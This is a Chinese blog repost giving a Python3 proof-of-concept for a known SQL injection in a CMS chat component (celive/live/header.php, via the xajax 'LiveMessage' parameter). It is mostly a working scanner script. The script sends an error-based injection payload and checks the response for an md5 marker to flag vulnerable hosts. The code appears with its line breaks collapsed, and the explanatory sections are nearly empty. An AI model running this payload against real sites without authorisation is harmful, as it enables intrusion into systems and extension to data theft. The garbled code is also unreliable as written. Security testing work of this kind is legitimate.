Python3实现PoC——wooyun-2014-070827(SQL注入)-白红宇

Python3实现PoC——wooyun-2014-070827(SQL注入)

阅读量：6526 次

发布时间：2019-06-24

本文共 884 字，大约阅读时间需要 2 分钟。

一、演示一下的利用效果

二、漏洞说明

这次的PoC是验证SQL注入，

三、代码+注释

import requestsimport argparseparser = argparse.ArgumentParser()parser.add_argument('-u', dest="url")args = parser.parse_args()url = args.url# 存在漏洞的页面url += "/celive/live/header.php"# 构造payload，用md5结果来验证payload = {    'xajax': 'LiveMessage',    'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"                          "concat(floor(rand(0)*2),(select md5(888)))a"                          " from information_schema.tables group by a)b)"                          ",'','','','1','127.0.0.1','2') #"}try:    r = requests.post(url, data=payload)    if(r.status_code == requests.codes.ok):        if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:            print("{} is SQL_vul".format(url))        else:            print("{} is not SQL_vul".format(url))except Exception as e:    print(str(e))

转载于:https://blog.51cto.com/l4ser/1883810

你可能感兴趣的文章

C# 语言历史版本特性（C# 1.0到C# 7.1汇总更新）

vue2.0 引用qrcode.js实现获取改变二维码的样式

查看>>

Python 判断闰年，判断日期是当前年的第几天

查看>>